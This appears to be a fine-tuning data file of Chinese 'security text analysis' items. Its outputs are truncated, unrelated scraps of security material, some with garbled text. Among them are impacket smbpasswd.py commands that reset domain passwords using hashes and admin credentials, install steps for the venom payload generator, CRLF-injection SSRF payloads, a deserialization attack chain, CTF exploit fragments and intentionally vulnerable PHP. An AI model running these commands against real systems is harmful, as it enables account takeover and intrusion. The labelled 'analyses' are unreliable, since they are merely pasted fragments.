Notebook, Note from pwn import * def build(name,addr,offset,choice): book = Notebook() note = book.note.add() note.name = name note.addr = addr note.offset = offset note.choice = choice payload = book.SerializeToString() return payload def run(buf): s.sendlineafter(b\"Hello Pls input: \",buf) s.sendlineafter(b\"file size\",str(len(buf)).encode()) def read(addr): Reverse ddl exe调dll内的些函数直接动调看逻辑即可 输先单字节xor 0x66 再前后16字节分别AES-128key为\"0123456789abcd", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDrinking from LETHE: New methods of exploiting and mitigating memory corruption vulnerabilities Daniel Selifonov DEF CON 23 August 7, 2015 Show of Hands 1. Have you written programs in C or C++? 2. Have you implemented a classic stack smash exploit? 3.  a return-to-libc or return-oriented- programming exploit? 4.  a return-to-libc or ROP exploit that used memory disclosure or info leaks? Motivations  Software is rife with memory corruption vulnerabilities  Most memory corruption vulnerabilities are directly applicable to code execution exploits  And there's no end in sight... Motivations (II)  Industrialized ecosystem of vulnerability discovery and brokering weaponized exploits  Little of this discovery process feeds into fixes... The other AFL Motivations (III)  State actor (e.g. NSA Tailored Access Operations group) budgets:  $  Bug bounties just drive up prices  Target supply, not demand for exploits... The Plan  Sever the path between vulnerability and (reliable) exploit  Why do programmers keep hitting this fundamental blindspot?  Defenses are born in light of attack strategies Memory Safety #include <stdio.h> int main() { foo(); bar(11, 12); return 0; } void foo() { int a; char b[23]; gets(b); printf(\"Hey %s!\\n\",b); } int bar(int x, int y) { return x + y; } Memory Safety #include <stdio.h> int main() { foo(); bar(11, 12); return 0; } void foo() { int a; char b[23]; gets(b); printf(\"Hey %s!\\n\",b); } int bar(int x, int y) { return x + y; } Memory Safety #include <stdio.h> int main() { foo(); bar(11, 12); return 0; } void foo() { int a; char b[23]; gets(b); printf(\"Hey %s!\\n\",b); } int bar(int x, int y) { return x + y; } <return address to C runtime exit> Memory Safety #include <stdio.h> int main() { foo(); bar(11, 12); return 0; } void foo() { int a; char b[23]; gets(b); printf(\"Hey %s!\\n\",b); } int bar(int x, int y) { return x + y; } <return address to C runtime exit> Memory Safety #include <stdio.h> int main() { foo(); bar(11, 12); return 0; } void foo() { int", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 修改windows hash 般是拿下域控进操作建议使域管权限修改不会出现账户过期问题 其他例 如果出现过期问题可在域控上修改户属性也可通过dsmod远程修改 总结 # 管理员权限修改 python3 smbpasswd.py test.com/zhangsan@192.168.111.146 -newpass \"Test@12345 6666\" -altuser administrator -altpass \"Test@123\" -debug -admin 1 2 Shell 复制代码 smbpasswd.py j.doe@192.168.1.11 smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971 889 smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b 58f2c319b81b3a49cb smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -a ltuser administrator -altpass 'Adm1nPassw0rd!' smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b 58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!' -admin smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502 da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6 a2091001d98a913ab 1 2 3 4 5 6 7 Shell 复制代码 2 smbpasswd.py通过纯445利 PS:windows使双引号 通过域管修改下户密码 分析 powershell \"Set-ADUser -Identity zhangsan -ChangePasswordAtLogon $false\" # 远程操作 dsquery.exe user -s 192.168.111.146 -u administrator -p Test@123 -name zhan gsan dsmod user \"CN=zhangsan,CN=Users,DC=test,DC=com\" -s 192.168.111.146 -u ad ministrator -p Test@123 -mustchpwd no -acctexpires never 1 2 3 4 5 Shell 复制代码 smbpasswd.py j.doe@192.168.1.11 smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971 889 smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b 58f2c319b81b3a49cb smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -a ltuser administrator -altpass 'Adm1nPassw0rd!' smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b 58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!' -admin smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnames=[17220, 24, 27220, 38, 48065, 48073, 58073, 68073, 80099, 8034, 97316 ] ends= [30063, 28, 48063, 13066,48068, 64831, 72088, 80088 ,109822,24013,119733] bytes=[-1]*119738 for name, end in zip(names,ends): data=open(str(name),\"rb\").read() f=data.find(\"\\r\\n\\r\\n\") data=data[f+4:] for i, c in enumerate(data): if bytes[i+name]==-1: bytes[i+name]=ord(c) if bytes[i+name]!=ord(c): print \"Mismatch\" for i, c in enumerate(bytes): if c==-1: print \"Missing at\",hex(i) bytes[i]=0xcc open(\"png.png\",\"wb\").write(\"\".join([chr(c) for c in bytes]))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python3 import inspect import os import random import sqlite3 import string import sys import base64 from html import escape from urllib import parse from typing import Union, List, Tuple import datetime from subprocess import STDOUT, check_output import requests from flask import Flask, send_from_directory, send_file, request, Response, g, make_response, jsonify from flags import DB_SECRET, DECRYPTED, DEV_NULL, LOCALHOST, LOGGED_IN STATIC_PATH = \"../client/site\" DATABASE = \".paperbots.db\" MIGRATION_PATH = \"./db/V1__Create_tables.sql\" THUMBNAIL_PATH = os.path.join(STATIC_PATH, \"thumbnails\") WEE_PATH = \"../weelang\" WEETERPRETER = \"weeterpreter.ts\" WEE_TIMEOUT = 5 os.makedirs(THUMBNAIL_PATH, exist_ok=True) app = Flask(__name__, static_folder=STATIC_PATH, static_url_path=\"/static\") encrypted = None def get_db() -> sqlite3.Connection: db = getattr(g, '_database', None) if db is None: db = g._database = sqlite3.connect(DATABASE) return db def init_db(): with app.app_context(): db = get_db() with open(MIGRATION_PATH, \"r\") as f: db.cursor().executescript(f.read()) db.execute(\"CREATE TABLE `secrets`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `secret` varchar(255) NOT NULL)\") db.execute(\"INSERT INTO secrets(secret) values(?)\", (DB_SECRET,)) db.commit() def query_db(query, args=(), one=True) -> Union[List[Tuple], Tuple, None]: if not isinstance(args, tuple): args = (args,) cur = get_db().execute(query, args) rv = cur.fetchall() cur.close() return (rv[0] if rv else None) if one else rv def user_by_token(token) -> Tuple[int, str, str, str]: \"\"\" queries and returns userId, username, email, usertype for a given token :param token: the token :return: userId, name, email, usertype \"\"\" if not token: raise AttributeError(\"Token must not be empty\") userId, = query_db(\"SELECT userId FROM userTokens WHERE token=?\", token) # TODO: Join this? name, email, usertype = query_db(\"SELECT name, email, type FROM users WHERE id=?\", userId) return userId, name, email, usertype def rand", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于如何在kali-2019.4上安装 Venom 我尝试在最新版的kali-2019.4上面安装venom但是安装软件依赖的时候提示超 时无法继续安装如下图 后面在各大安全群寻求帮助都没有答复而后只能向国外友人询问他告诉我最 新版kali无法安装是因为没有安装zenity 安装 成功截图生成exe均没有问题 安装zenity apt-get install zenity 下载源码 git clone https://github.com/r00t-3xp10it/venom.git 设定执行许可 cd venom-main sudo find ./ -name \"*.sh\" -exec chmod +x {} \\; sudo find ./ -name \"*.py\" -exec chmod +x {} \\; 安装所有依赖项 cd aux && sudo ./setup.sh 运行主工具 sudo ./venom.sh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n文件上传反制跳板站点 本篇文章主要介绍一次通过黑客跳板站点获取攻击者 IP 案例利用前期的 信息收集对跳板站点进行渗透测试一步步取证攻击者的攻击手法工具和 IP 的 过程 目录 文件上传反制跳板站点 ........................................................................................................................ 1 一事件背景 .................................................................................................................................. 1 二反制过程 .................................................................................................................................. 2 信息收集 .................................................................................................................................. 3 代码审计 .................................................................................................................................. 8 上传漏洞利用分析 ............................................................................................................ 11 三线索收集 ............................................................................................................................... 12 扩展线索 ............................................................................................................................... 13 四事件小结 ............................................................................................................................... 14 一事件背景 这篇文章主要介绍实操利用文件上传漏洞对跳板站点反制这个 C2 来自于某 方向分析报告攻击者黑了一批正常网站然后往上面丢了诱饵文档利用此类结合 了时事热点的恶意样本再对周边国家和地区发起了多次攻击活动 网站首页中被插入了一个 iframe该 iframe 会判断用户 IP 等信息若是目标 用户则下发木马给受害者 二反制过程 对事件分析的完整溯源需要明确的是 who(对手受害者), what(基础设施能 力), when(时间), where(地点), why(意图), how(方法)通过聚焦于 IOC 的分析包括 对事件分析样本类型的分析IOC 的提取威胁情报产生是各大安全厂商有力的 分析手段为事件分析提供了坚实的数据来源而对反制攻击者基础设施获取数据 对形成攻击者画像完善攻击者链条起到了线索弥补和数据源扩充的作用 信息收集 前文介绍了端口扫描目录扫描的信息收集方式Google hacking 也是信息收 集中的常用渠道因为 Google 搜索引擎本身提供了各种搜索语法搜索时配合这 些语法可以获取到更加精确的结果而利用语法加上特定关键字可以搜索到目标站 点的目录文件报错等重要信息 以下是 google 搜索引擎自带的基础常用语法 intitle: 以网页标题中关键字搜索 inurl: 从 url 中存在的关键字进行搜索匹配 Iintext:以网页正文中的关键字进行搜索 filetype:搜索指定的文件后缀 Site:指定域名 link:例如 link:www.google.com 表示搜索所有链接了 google.com 的 url 常用的通配符 + ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport os from Crypto.Cipher import AES def crc32(crc, data): crc = 0xFFFFFFFF  crc for c in data: crc = crc  ord(c) for i in range(8): crc = (crc >> 1)  (0xEDB88320 * (crc & 1)) return 0xFFFFFFFF  crc key = b\"\" crc = 0 for i in range(int(\"1\" * 10000)): crc = crc32(crc, \"TSG\") assert(crc == 0xb09bc54f) key += crc.to_bytes(4, byteorder='big') crc = 0 for i in range(int(\"1\" * 10000)): crc = crc32(crc, \"is\") key += crc.to_bytes(4, byteorder='big') crc = 0 for i in range(int(\"1\" * 10000)): crc = crc32(crc, \"here\") key += crc.to_bytes(4, byteorder='big') crc = 0 for i in range(int(\"1\" * 10000)): crc = crc32(crc, \"at\") key += crc.to_bytes(4, byteorder='big') crc = 0 for i in range(int(\"1\" * 10000)): crc = crc32(crc, \"SECCON\") key += crc.to_bytes(4, byteorder='big') crc = 0 for i in range(int(\"1\" * 10000)): crc = crc32(crc, \"CTF!\") key += crc.to_bytes(4, byteorder='big') flag = os.environ['FLAG'] assert(len(flag) == 32) aes = AES.new(key, AES.MODE_ECB) encoded = aes.encrypt(flag) assert(encoded.hex() == '79833173d435b6c5d8aa08f790d6b0dc8c4ef525823d4ebdb0b4a8f2090ac81e')", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n* [技术面试问题](#技术面试问题) * [CTF](#ctf) * [说一个印象深刻的CTF的题目](#说一个印象深刻的ctf的题目) * [sql二次注入](#sql二次注入) * [Python](#python) * [爬虫模块框架反爬虫机制IP-&gt;代理池验证码破解UA](#爬虫模块框架反爬虫机制ip-代理池验证码破解ua) * [并发(多线程线程池协程三个程之间的区别)](#并发多线程线程池协程三个程之间的区别) * [常用的标准库](#常用的标准库) * [DJANGO和FLASK区别和使用](#django和flask区别和使用) * [ORM](#orm) * [python安全工具编写/源码阅读](#python安全工具编写源码阅读) * [证明能力](#证明能力) * [密码学](#密码学) * [RSA](#rsa) * [DES](#des) * [AES](#aes) * [国内SM系列](#国内sm系列) * [风险评估](#风险评估) * [流程](#流程) * [三要素](#三要素) * [代码审计](#代码审计) * [Fority SCA审计JAVA代码](#fority-sca审计java代码) * [Seay审计PHP代码](#seay审计php代码) * [源码阅读](#源码阅读) * [应急响应具体流程](#应急响应具体流程) * [模型](#模型) * [实例](#实例) * [DDOS](#ddos) * [DDOS是什么](#ddos是什么) * [实例](#实例-1) * [主机被入侵](#主机被入侵) * [渗透测试流程相关](#渗透测试流程相关) * [渗透测试流程](#渗透测试流程) * [渗透测试项目](#渗透测试项目) * [渗透测试具体实施](#渗透测试具体实施) * [17年OWASP TOP10](#17年owasp-top10) * [常见的Web安全漏洞](#常见的web安全漏洞) * [挖过什么逻辑漏洞](#挖过什么逻辑漏洞) * [订单任意金额修改](#订单任意金额修改) * [验证码回传](#验证码回传) * [未进行登陆凭证验证](#未进行登陆凭证验证) * [接口无限制枚举](#接口无限制枚举) * [cookie设置存在缺陷](#cookie设置存在缺陷) * [找回密码功能缺陷](#找回密码功能缺陷) * [你常用的渗透工具有哪些最常用的是哪个](#你常用的渗透工具有哪些最常用的是哪个) * [扫描:Nessus,AWVS,Nikto](#扫描nessusawvsnikto) * [SQLmap](#sqlmap) * [Nmap](#nmap) * [Metasploit](#metasploit) * [Hydra](#hydra) * [kali信息收集工具](#kali信息收集工具) * [流量分析WireShark](#流量分析wireshark) * [描述一个你深入研究过的CVE或POC(ms17-010/最新的CVE)](#描述一个你深入研究过的cve或pocms17-010最新的cve) * [数据库注入](#数据库注入) * [MySQL面试题](#mysql面试题) * [MySQL存储引擎](#mysql存储引擎) * [什么是事务](#什么是事务) * [读锁和写锁](#读锁和写锁) * [MySQL的索引](#mysql的索引) * [ORDER BY在注入的运用](#order-by在注入的运用) * [GPC是什么GPC之后怎么绕过](#gpc是什么gpc之后怎么绕过) * [Mysql一个@和两个@什么区别](#mysql一个和两个什么区别) * [注入/绕过常用的函数](#注入绕过常用的函数) * [MySQL存储过程](#mysql存储过程) * [各种写shell的问题](#各种写shell的问题) * [注入类型](#注入类型) * [SQL注入的原理](#sql注入的原理) * [过waf](#过waf) * [如何进行SQL注入的防御](#如何进行sql注入的防御) * [mysql的网站注入5.0以上和5.0以下有什么区别](#mysql的网站注入50以上和50以下有什么区别) * [SQL和NoSQL的区别](#sql和nosql的区别) * [SQL优点](#sql优点) * [SQL缺点](#sql缺点) * [NoSQL优点](#nosql优点) * [比较](#比较) * [MongoDB注入方式](#mongodb注入方式) * [XSS CSRF XXE](#xss-csrf-xxe) * [CSRF 和 XSS 和 XXE 有什么区别以及修复方式](#csrf-和-xss", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nftpshut === 在指定的时间关闭FTP服务器 ## 补充说明 功能说明在指定的时间关闭ftp服务器本指令提供系统管理者在设置的时间关闭FTP服务器且能在关闭之前发出警告信息通知用户关闭时间若设置后为\"none\"则会马上关闭服务器如果采 用\"+30\"的方式来设置表示服务器在30分钟之后关闭依次类推假设使用\"1130\"的格式则代表服务器会在每日的11时30分关闭时间格式为24 小时制FTP服务器关闭后在/etc目录下会产生一个名称为shutmsg的文件把它删除后即可再度启动FTP服务器的功能 语法 ```shell ftpshut [-d<分钟>][-l<分钟>][关闭时间][\"警告信息\"] ``` 参数 ```shell -d<分钟> 切断所有FTP连线时间 -l<分钟> 停止接受FTP登入的时间 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### XSS 简介 跨站脚本Cross-Site ScriptingXSS是一种经常出现在 WEB 应用程序中的计算机安全漏洞是由于 WEB 应用程序对用户的输入过滤不足而产生的攻击者利用网站漏洞把恶意的脚本代码注入到网页中当其他用户浏览这些网页时就会执行其中的恶意代码对受害用户可能采取 Cookies 资料窃取会话劫持钓鱼欺骗等各种攻击 ### 反射型 XSS介绍 反射型跨站脚本Reflected Cross-Site Scripting是最常见也是使用最广的一种可将恶意脚本附加到 URL 地址的参数中 反射型 XSS 的利用一般是攻击者通过特定手法如电子邮件诱使用户去访问一个包含恶意代码的 URL当受害者点击这些专门设计的链接的时候恶意代码会直接在受害者主机上的浏览器执行此类 XSS 通常出现在网站的搜索栏用户登录口等地方常用来窃取客户端 Cookies 或进行钓鱼欺骗 服务器端代码 ```php <?php // Is there any input? if( array_key_exists( \"name\", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> ``` 可以看到代码直接引用了 `name` 参数并没有做任何的过滤和检查存在明显的 XSS 漏洞 ### 持久型 XSS介绍 持久型跨站脚本Persistent Cross-Site Scripting也等同于存储型跨站脚本Stored Cross-Site Scripting 此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本攻击者事先将恶意代码上传或储存到漏洞服务器中只要受害者浏览包含此恶意代码的页面就会执行恶意代码持久型 XSS 一般出现在网站留言评论博客日志等交互处恶意脚本存储到客户端或者服务端的数据库中 服务器端代码 ```php <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = mysql_real_escape_string( $message ); // Sanitize name input $name = mysql_real_escape_string( $name ); // Update database $query = \"INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );\"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); //mysql_close(); } ?> ``` 代码只对一些空白符特殊符号反斜杠进行了删除或转义没有做 XSS 的过滤和检查且存储在数据库中明显存在存储型 XSS 漏洞 ### DOM XSS漏洞介绍 传统的 XSS 漏洞一般出现在服务器端代码中而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞所以受客户端浏览器的脚本代码所影响客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型因此能够决定用于加载当前页面的 URL换句话说客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容它不依赖于服务器端的数据而从客户端获得 DOM 中的数据如从 URL 中提取数据并在本地执行另一方面浏览器用户可以操纵 DOM 中的一些对象例如 URLlocation 等用户在客户端输入的数据如果包含了恶意 JavaScript 脚本而这些脚本没有经过适当的过滤和消毒那么应用程序就可能受到基于 DOM 的 XSS 攻击 HTML 代码 ```html <html> <head> <title>DOM-XSS test</title> </head> <body> <script> var a=document.URL; document.write(a.substring(a.indexOf(\"a=\")+2,a.length)); </script> </body> </html> ``` 将代码保存在 domXSS.html 中浏览器访问 `", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRoaming Mantis: an Anatomy of a DNS Hijacking Campaign Suguru Ishimaru GReAT APAC Kaspersky Lab Manabu Niseki NTT-CERT NTT SC Labs Hiroaki Ogawa Professional Service McAfee 2 Contents 1. Introduction 2. What is Roaming Mantis 3. MoqHao and SMShing 4. Attribution 5. Conclusions HITCON CMT 2019 $ whoami Introduction of ourselves Who are we..? 4 HITCON CMT 2019 Manabu Niseki NTT-CERT NTT SC Labs Suguru Ishimaru GReAT APAC Kaspersky Labs Hiroaki Ogawa Professional Service McAfee $ man roamingmantis What is Roaming Mantis Phishing site Web mining Malicious APK Multilingual 6 HITCON CMT 2019 What is Roaming Mantis?  Cyber criminal campaign  Compromised routers  Targeted multi platform and multiple language  Started since early 2018 7 HITCON CMT 2019 What is Roaming Mantis? Compromised router Roaming Bugdroids color Mistakes (BUG) Mantis Roaming Mantis aka 少爺(Shaoye) 8  ５７東森財經新聞台: 少爺殭屍網路擴散 全球百萬筆個資遭竊 (2018/06/07)  https://www.youtube.com/watch?v=NEVMxhXG2lE  TWNCERT: Shaoye Botnet Affecting Network Devices in Asia-Pacific (2018/06/14)  https://www.nccst.nat.gov.tw/NewsRSSDetail?lang=en&RSSType=news&seq=16111 TWNCERT says:  At least 6,000 mobile devices are infected with malicious apps, leaking more than 1 million pieces of personal information.  The infection spreads to 55 countries in the world and South Korea being the main target has a victim rate of 75%. Compromised routers 9 HITCON CMT 2019 Compromised routers 10 HITCON CMT 2019 Rogue DNS servers 11 A B C D Primary 1.53.252.215 (Vietnam) 171.244.3.110 (Vietnam) 118.30.28.38 (China) 42.112.35.45 (Vietnam) Secondary 1.53.252.164 (Vietnam) 171.244.3.111 (Vietnam) 118.30.28.39 (China) 42.112.35.55 (Vietnam) Korea is the first priority target 12 168.126.63.1 (Korea Telecom / Korea) 203.248.252.2 (LG DACOM Corporation / Korea) 219.250.36.130 (SK Broadband Co Ltd / Korea) Note: they are legitimate DNS servers in Korea DNS changer 13 HITCON CMT 2019  My handmade honeypot (which impersonates a Korean router) observed a DNS chan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 PEID dll  dll getshell 0x02 C# https://xz.aliyun.com/t/9168 https://xz.aliyun.com/t/9591 https://xz.aliyun.com/t/9593 https://xz.aliyun.com/t/9592 https://xz.aliyun.com/t/9594 https://xz.aliyun.com/t/9595 https://xz.aliyun.com/t/9597 https://xz.aliyun.com/t/9598 https://xz.aliyun.com/t/9599 https://xz.aliyun.com/t/9600 https://xz.aliyun.com/t/9601 https://xz.aliyun.com/t/9602 https://xz.aliyun.com/t/9603 https://xz.aliyun.com/t/9604 https://xz.aliyun.com/t/9605 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 https://xz.aliyun.com/u/12258 1  OnLoginEvent  UserInfo SendLoginMsg  UserInfo MsgSysInfo zip GetBuffer Login json  zip dh Init    YYSharpZip GetBuffer GetZipBuffer BinaryFormatter EncryptData  this.btnLogin_Click --> this.OnLoginEvent() --> this.SendLoginMsg() --> this.zip.GetBuffer() --> this.ZipData() --> this.GetZipBu ffer() --> new BinaryFormatter().Serialize() --> this.CompressToByte() --> new YYEncrypt().EncryptData() --> this.dh.Login() 1 XXX.MsgReceive --> new YYEncrypt().DecryptData-->this.DeCompressToBytes --> new BinaryFormatter().Deserialize() --> this.msgSysIn fo.getLoginInfo() --> XXX 1 Ysoserial.NET --> Gadget serialize data --> this.zip.GetBuffer --> this.ZipData --> this.GetZipBuffer --> new BinaryFormatter().S erialize() --> this.CompressToByte --> new YYEncrypt().EncryptData --> Send To Tartget Server --> XXX.MsgReceive --> new YYEncryp t().DecryptData-->this.DeCompressToBytes --> new BinaryFormatter().Deserialize() --> Attack success 1 0x03 Gadget Gadget Gadget Ysoserial.NET iis aspx shell 0x04 shell payload payload", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1. 2. xxx 3. xxx ED 1. tcp/ipwin/linuxpython 2. javawebjava iot 3. kalinmapsqlmapburpsuiteida ->->->->->->->-> ->->-> mmorpg web apppwn websrcphp java web sxfvpn 1. sxf vpn 2. vpn 3. 4. vpnphpapachenodejs 5. 6. 1. 2. 3. 4. 5. 1. 2. 3. 1. 2. 3. 4. 5. p p 6. 7. 8. 9. 10. cms", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Linux下echo计算哈希的坑 因为遇到好次了每次都忘记搞得要怀疑分钟故简单记录下避免下次坑 linux下常的计算的哈希命令: md5sum sha256sum 但是这两个命令读取的是参数指定的件名或者是标准的输 那么如果我们想加密单个字符串的时候般会这样利管道符来使: 1. echo '123' |md5sum 2. echo '123'|sha256sum 得到的是: 123 -> md5 -> ba1f2511fc30423bdbb183fe33f3dd0f 123 -> sha256 -> 181210f8f9c779c26da1d9b2075bde0127302ee0e3fca38c9a83f5b1dd 8e5d3b 我们使Python计算下就可以发现个有趣的现象: 2 真是情况是: 123 -> md5 -> 202cb962ac59075b964b07152d234b70 123\\n 对应的才是 ba1f2511fc30423bdbb183fe33f3dd0f 那么问题出在了哪呢? 观察图可以看到输出换了原因就是: 默认的echo输出会在字符串的末尾加上个换符 那么怎么解决这个问题呢通过查看 man echo 可以知道加上 -n 参数就可以不输出末尾的的换 符 问题解决: Python 复制代码 import hashlib print(hashlib.md5(\"123\".encode()).hexdigest()) print(hashlib.md5(\"123\\n\".encode()).hexdigest()) 1 2 3 3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai Agenda Introduction Make SSRF great again Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations What is SSRF? Server Side Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic Protocol Smuggling in SSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached Quick Fun Example http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 httplib requests urllib Quick Fun Example Python is so Hard Quick Fun Example CR-LF Injection on HTTP protocol Smuggling SMTP protocol over HTTP protocol http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1] >> HELO orange.tw Connection closed SMTP Hates HTTP Protocol It Seems Unexploitable Gopher Is Good What If There Is No Gopher Support? HTTPS What Won't Be Encrypted in a SSL Handshake? Quick Fun Example https://127.0.0.1%0D%0AHELOorange.tw%0D%0AMAILFROM:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. tw..MAI 000001f0: 4c20 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# NoName > https://download.vulnhub.com/haclabs/HL.ova 靶场IP`192.168.32.22` 扫描对外端口服务 ``` (rootkali)-[~] # nmap -sV -p1-65535 192.168.32.22 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-14 00:28 EDT Nmap scan report for 192.168.32.22 Host is up (0.00017s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) MAC Address: 08:00:27:74:12:22 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds ``` 访问80端口但是无法执行ping命令 ![image-20220914122855710](../../.gitbook/assets/image-20220914122855710.png) 爆破目录找到`/superadmin.php ` ``` (rootkali)-[~] # gobuster dir -u http://192.168.32.22 -w /usr/share/wordlists/dirb/big.txt -x .php =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.32.22 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2022/09/14 00:31:46 Starting gobuster in directory enumeration mode =============================================================== /.htpasswd.php (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /.htaccess.php (Status: 403) [Size: 278] /admin (Status: 200) [Size: 417] /index.php (Status: 200) [Size: 201] /server-status (Status: 403) [Size: 278] /superadmin.php (Status: 200) [Size: 152] =============================================================== 2022/09/14 00:32:12 Finished =============================================================== ``` 访问`/superadmin.php ` ![image-20220914123259003](../../.gitbook/assets/image-20220914123", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nControlling the Source: Abusing Source Code Management Systems Brett Hawkins (@h4wkst3r) Adversary Simulation, IBM X-Force Red Agenda 2 IBM Security /  2022 IBM Corporation  Introduction  Source Code Management Systems  GitHub Enterprise  GitLab Enterprise  Bitbucket  SCMKit  Demos  Defensive Considerations  Conclusion Introduction IBM Security /  2022 IBM Corporation 3 Who am I? 4 IBM Security /  2022 IBM Corporation  Current Role  Adversary Simulation, IBM X-Force Red  Previous Roles - Mandiant, J.P. Morgan Chase, J.M. Smucker Company  Conference Speaker  DerbyCon, Wild West Hackin Fest, BSides, Hackers Teaching Hackers  Open-Source Tool Author  SharPersist, DueDLLigence, InvisibilityCloak, SCMKit How did this research come about? 5 IBM Security /  2022 IBM Corporation  Real-world experience attacking source code management systems  Recent Security Breaches  Software Supply Chain Attacks - SolarWinds, Kaseya, Codecov  Source Code Theft - LAPSUS$  Microsoft - Azure DevOps  T-Mobile - Bitbucket  Samsung - GitHub 